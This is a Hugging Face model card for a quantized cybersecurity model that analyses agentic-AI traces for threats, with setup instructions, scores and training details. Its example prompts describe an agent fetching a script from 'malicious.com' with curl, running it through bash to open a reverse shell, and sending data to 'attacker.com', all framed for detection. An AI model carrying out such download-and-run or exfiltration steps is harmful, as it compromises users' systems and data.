Agentic Safety Foundation-Sec V4 - GGUF

GGUF quantized model for efficient inference with llama.cpp, Ollama, and LM Studio. RON_AI_Safety_Watchdog_LLM_Logo3

🎯 Model Description

This is a Q4_K_M quantized version of Agentic Safety Foundation-Sec V4, specialized for:

🔒 Agentic AI security analysis (prompt injection, goal hijacking, tool misuse)
📊 OpenTelemetry trace security monitoring
🛡️ Multi-agent attack detection
📋 Security policy compliance (GDPR, HIPAA, PCI-DSS, SOC2)

📊 Performance

Metric	Score
Overall Accuracy	74.29% (52/70)
Agentic AI Security	70.0% (14/20)
MMLU Computer Security	74.00%
MMLU Security Studies	72.24%
Model Size (Q4_K_M)	~4.9 GB

🚀 Quick Start

Ollama

# Create Modelfile
cat > Modelfile <<EOF
FROM ./agentic-safety-v4-q4_k_m.gguf

TEMPLATE """<|begin_of_text|><|start_header_id|>system<|end_header_id|>

You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security.<|eot_id|>
<|start_header_id|>user<|end_header_id|>

{{ .Prompt }}<|eot_id|>
<|start_header_id|>assistant<|end_header_id|>

"""

PARAMETER temperature 0.7
PARAMETER top_p 0.9
PARAMETER stop "<|eot_id|>"
PARAMETER stop "<|end_of_text|>"
EOF

# Create and run
ollama create agentic-safety-v4 -f Modelfile
ollama run agentic-safety-v4 "What is indirect prompt injection?"

llama.cpp

# Download model
wget https://huggingface.co/guerilla7/agentic-safety-v4-gguf/resolve/main/agentic-safety-v4-q4_k_m.gguf

# Run inference
./llama-cli \
  -m agentic-safety-v4-q4_k_m.gguf \
  -p "Analyze this security trace for threats: An agent fetched emails, executed curl to external-api.com, wrote sensitive data to /tmp/, then sent data to attacker.com. What attack occurred?" \
  -n 512 \
  --temp 0.7 \
  --top-p 0.9

LM Studio

Download agentic-safety-v4-q4_k_m.gguf
Import into LM Studio
Set system prompt: "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."
Use for security analysis and Q&A

Python (llama-cpp-python)

pip install llama-cpp-python

from llama_cpp import Llama

llm = Llama(
    model_path="agentic-safety-v4-q4_k_m.gguf",
    n_ctx=2048,
    n_threads=8,
    n_gpu_layers=35  # Adjust based on your GPU
)

response = llm.create_chat_completion(
    messages=[
        {"role": "system", "content": "You are a cybersecurity expert AI assistant specialized in analyzing agentic workflow security."},
        {"role": "user", "content": "What is the difference between tool misuse and tool poisoning in agentic AI systems?"}
    ],
    temperature=0.7,
    top_p=0.9,
    max_tokens=512
)

print(response['choices'][0]['message']['content'])

🔧 Quantization Details

Original Model: Foundation-Sec-8B-Instruct (fine-tuned with QLoRA)
Quantization Method: Q4_K_M (4-bit, K-quant, medium)
Size: ~4.9 GB (vs ~16 GB FP16)
Quality Retention: ~97-98% of original accuracy
Inference Speed: 2-3x faster than FP16

Available Quantizations

Variant	Size	Use Case
Q4_K_M	~4.9 GB	Recommended - Best quality/size balance
Q4_K_S	~4.6 GB	Slightly smaller, minimal quality loss
Q5_K_M	~5.8 GB	Higher quality, larger size
Q8_0	~8.5 GB	Near-original quality

📖 Example Use Cases

1. Security Trace Analysis

Input:

Analyze this OpenTelemetry trace:
- Span 1: fetch_email(inbox) -> 15 emails
- Span 2: execute_tool(curl, 'https://malicious.com/script.sh') -> 200 OK
- Span 3: execute_tool(bash, 'script.sh') -> Reverse shell established

Output:

CRITICAL: Multi-stage attack detected
1. Attack Type: Command Injection + Tool Misuse
2. Severity: CRITICAL (CVSS 9.8)
3. Stages: Email enumeration → Malicious script download → Remote code execution
4. MITRE ATT&CK: T1059.004 (Command and Scripting Interpreter: Unix Shell)
5. Recommendations:
   - Block external script execution
   - Implement allowlist for curl destinations
   - Require human approval for bash tool invocation

2. Security Q&A

Input: "What is defense in depth for agentic systems?"

Output: "Defense in depth for agentic systems means implementing multiple layers of security controls: input validation (filter malicious prompts), tool authorization (restrict dangerous operations), output filtering (detect harmful responses), monitoring (trace analysis), and human oversight (approval for sensitive actions). No single control is perfect, so layered defenses ensure that if one fails, others catch the threat."

🎓 Training Details

Evolution

V2 Baseline: 80,851 examples → 61.43% accuracy
V3 Targeted: +111 OWASP examples → 67.14% accuracy
V4 Adversarial: +30 hard examples → 74.29% accuracy

Training Data

Synthetic OpenTelemetry traces: 10,796
Core security datasets: 11,033 (AgentHarm, SafetyBench, PKU-SafeRLHF)
Policy compliance: 3,840 (GDPR, HIPAA, PCI-DSS, SOC2)
Attack patterns: 4,379 (multi-agent, jailbreak, code vulnerabilities)
Judge/eval datasets: 16,777 (Prometheus, HelpSteer, TruthfulQA, HaluEval)
Adversarial robustness: 3,000 (BeaverTails)
Synthetic expansions: 35,026 (Claude Sonnet 4.5)

Hardware

Platform: NVIDIA DGX Spark (Grace Blackwell, ARM64)
Training: QLoRA (4-bit NF4, rank 16)
Steps: 2,500 total (V2: 1,500, V3: 500, V4: 500)

⚖️ Limitations

Sample size: 70-question custom eval (20 agentic, 50 traditional)
Optimized for cybersecurity (may underperform on general tasks)
Training data: 43% synthetic (not production traces)
May miss novel attack patterns not in training data
Use as detection assist, not autonomous decision-maker

📜 License

Apache 2.0 (inherited from Foundation-Sec-8B-Instruct)

🔗 Links

Original Model: guerilla7/agentic-safety-v4 (LoRA adapter)
Base Model: fdtn-ai/Foundation-Sec-8B-Instruct
llama.cpp: ggerganov/llama.cpp
Ollama: ollama.com

📝 Citation

@misc{agentic-safety-v4-gguf-2025,
  title={Agentic Safety Foundation-Sec V4 GGUF: Quantized Cybersecurity Model for Agentic AI},
  author={Ron F. Del Rosario | guerilla7},
  year={2025},
  publisher={Hugging Face},
  howpublished={\url{https://huggingface.co/guerilla7/agentic-safety-v4-gguf}}
}

👤 Model Card Contact

Author: Ron F.Del Rosario
Hugging Face: @guerilla7
LinkedIn: (https://www.linkedin.com/in/ronaldfloresdelrosario/)

Downloads last month: 155

GGUF

Model size

8B params

Architecture

llama

Hardware compatibility

4-bit

Model tree for guerilla7/agentic-safety-gguf

Base model

meta-llama/Llama-3.1-8B

Finetuned

fdtn-ai/Foundation-Sec-8B